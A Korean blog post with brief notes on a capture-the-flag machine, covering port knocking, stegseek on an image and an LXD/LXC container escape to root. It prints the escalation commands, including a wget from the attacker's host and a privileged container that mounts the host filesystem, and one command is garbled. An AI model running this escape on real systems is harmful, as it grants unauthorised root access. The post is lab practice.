반응형
ssh 포트가 filtering 되어있음. port knocking일 가능성이 있음.
🛡️ Port Knocking이란?
Port Knocking은 외부에서 보이지 않던 포트를 “특정 순서대로” 접근하면, 내부 방화벽이 열리는 기술입니다.
🎯 목적:
- 서버의 접근 가능 포트를 숨겨서 보안 강화
- 정상 사용자만 특정 패턴을 통해 포트를 열 수 있도록 함
🔐 어떻게 작동하냐면?
- 서버는 모든 포트를 닫아둔 상태예요 (SSH, RDP 등 포함)
- 클라이언트가 정해진 포트 순서로 접근 시도함
예: 7000 → 8000 → 9000 순서로 SYN 패킷 전송 - 서버는 이 패턴을 감지함
- 특정 IP에 대해 방화벽 규칙을 임시로 열어줌
예: 192.168.1.100에 대해 port 22 (SSH) 허용 - 사용자는 이제 포트를 통해 접속 가능
base64처럼 생긴 암호문 발견
brainfuck 암호문 처럼 보임
index.html에서 주석을 발견 port knocking을 사용하는게 맞는 듯하다.
login.php에서 3.jpg가 있는 것을 발견하였고 stegseek을 이용해서 암호를 해독하니
4444, 10000, 65535를 발견하였다.
linpeas.sh를 실행해보면
lxd lxc를 사용가능한 것을 알 수있기 때문에 alpine다운
wget 192.168.1.3:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
lxd init # 4번째 dir설정
lxc init myimage ignite -c security.privileged=true
lxc config device and ignite mydevice disk source=/path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
반응형
'CTF' 카테고리의 다른 글
| CTF)Corrosion: 2 (0) | 2025.09.15 |
|---|---|
| CTF)Keyring (1) | 2025.09.12 |
| CTF)Momentum 1 (0) | 2025.09.04 |
| CTF)grotesque3 (0) | 2025.09.01 |
| CTF)Matrix-Breakout2 Morpheus (0) | 2025.08.29 |